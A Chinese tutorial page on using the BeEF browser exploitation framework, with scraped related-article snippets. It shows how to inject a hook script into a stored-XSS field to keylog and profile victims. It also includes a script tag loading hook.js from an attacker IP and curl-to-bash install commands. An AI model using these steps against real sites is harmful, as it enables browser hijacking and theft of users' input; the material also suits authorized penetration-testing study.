Beef的使用

应用普遍转移到B/S架构,浏览器成为统一客户端程序

通过注入JS脚本,利用浏览器攻击其他网站

ruby编写

攻击手段

利用网站XSS漏洞实现攻击

诱使客户端访问含有hook的伪造站点

结合中间人攻击注入hook脚本

常见用途

键盘记录器

网络扫描

浏览器信息收集

绑定shell

与metasploit集成

beef的使用

启动beef

在浏览器中输入上面的地址,进入beef登陆页面

这是beef的hook脚本地址

打开浏览器根据自己的ip输入上面的地址

开启beef的服务器端 ,默认用户名密码都是beef

在一个XSS存储漏洞的注入点,输入hook脚本如下

提交,在beef的服务器上就看到一个被hook的主机

浏览器,操作系统等详细信息

键盘记录器,鼠标点击

在被注入hook的页面输入信息时

beef上会收集到

模块

时间: 2024-10-10 18:05:06

Beef的使用的相关文章

Beef

修改配置文件/usr/share/beef-xss/config.yaml (1)改vi beef侦听端口:    http:   port:3000(改为80) (2)与Metaspolit关联: metasploit:  enable: false(改为true) like:ssl: false(改为true) (3) 配置一下拓展下的metasploit配置文件 vim /usr/share/beef-xss/extensions/metasploit/config.yaml 把ip填写成

CentOS安装beEF做XSS平台

提到xss平台,大部分人都在用xsser.me的源码搭建,xsser.me源码搭建的平台虽然好用,但是功能不够强大,比如无法和Metasploit配合使用进行更深一步的入侵测试. 这次部署邮件服务器大致分为3个步骤: 安装GEM 安装配置beEF 测试 >>安装GEM 步骤 1 » 安装rvm.导入key curl -sSL https://rvm.io/mpapis.asc | gpg2 --import 安装rvm curl -L get.rvm.io | bash -s stable 启

USACO 4.1 Beef McNuggets

Beef McNuggetsHubert Chen Farmer Brown's cows are up in arms, having heard that McDonalds is considering the introduction of a new product: Beef McNuggets. The cows are trying to find any possible way to put such a product in a negative light. One st

利用BeEF REST API自动化控制僵尸主机

本文已发布于Freebuf,属于原创奖励计划,未经许可禁止转载. http://www.freebuf.com/articles/network/137662.html 一. 前言 关于BeEF,不再多介绍,它的强大毋庸置疑,利用它我们可以做很多事情.最近的一些实验,需要用beef批量自动进行控制,发现网上也没有过多关于这方面内容的介绍,于是学习了一下它的API,顺便练习一下python编程,这里把自己的学习内容分享下.本文涉及的一些内容可能具有一定的攻击性,请遵守国家法律,禁止用于非法用途.

BeEF工具使用

步骤一:在kali 2.0里面已经预装了BeEF工具,只需要运行即可, 步骤二:运行后通过web方式登陆beef后台 127.0.0.1:3000/ui/authentication 登陆账号和密码都是beef 步骤三:在靶机上面访问以下测试网页,然后靶机就被攻击了,在beef后台页面可以看到靶机的相关信息了. http://192.168.1.108:3000/demos/butcher/index.html

beef结合msf钓鱼

Kali linux 系统默认未安装beef,需要自行安装 1 2 apt-get update apt-get install beef-xss 启动/usr/share/beef-xss 1 2 cd /usr/share/beef-xss ./beef 账号密码 127.0.0.1:3000/ui/pannel beef/beef 嵌入代码 <script src="Ip:3000/hook.js"> 与Metasploit联动 Beef配置文件 /usr/share

利用BeEF REST API自动化控制僵尸主机 --转载--作者ssooking

一. 前言 关于BeEF,不再多介绍,它的强大毋庸置疑,利用它我们可以做很多事 情.最近的一些实验,需要用beef进行批量自动控制,发现网上也没有过多关于这方面内容的介绍,于是学习了一下它的API,顺便练习一下python编 程,这里把自己的学习内容分享下.本文涉及的一些内容可能具有一定的攻击性,请遵守国家法律,禁止用于非法用途. 二. 通过API控制beef BeEF从0.4.3.3,版本开始,提供了静态API接口,用户可以通过发送HTTP / JSON请求控制Beef. 我们可以通过程序,批

BeEF和metasploit关联使用的相关配置

kali2.0系统默认安装了BeEF和metasploit两个工具,但是如果不经过配置默认启动这两个工具,他们是不能配合使用的,也就是说beEf框架是无法加载metasploit的,那么该如何配置使得beEf可以加载metasploit呢?客观请往下看. 1.配置BeEF的config.yaml文件,该文件路径为/usr/share/beef-xss/config.yaml 用leafpad打开该文件,拉到文件的最底端,往上找,修改metasploit配置项,修改成  enable:true 保

KALI LINUX WEB 渗透测试视频教程—第16课 BEEF基本使用

Kali Linux Web 渗透测试视频教程—第16课  BeEF基本使用 文/玄魂 目录 Kali Linux Web 渗透测试视频教程—第16课  BeEF基本使用....................... 1 BeEF............................................................................................................... 2 安装...................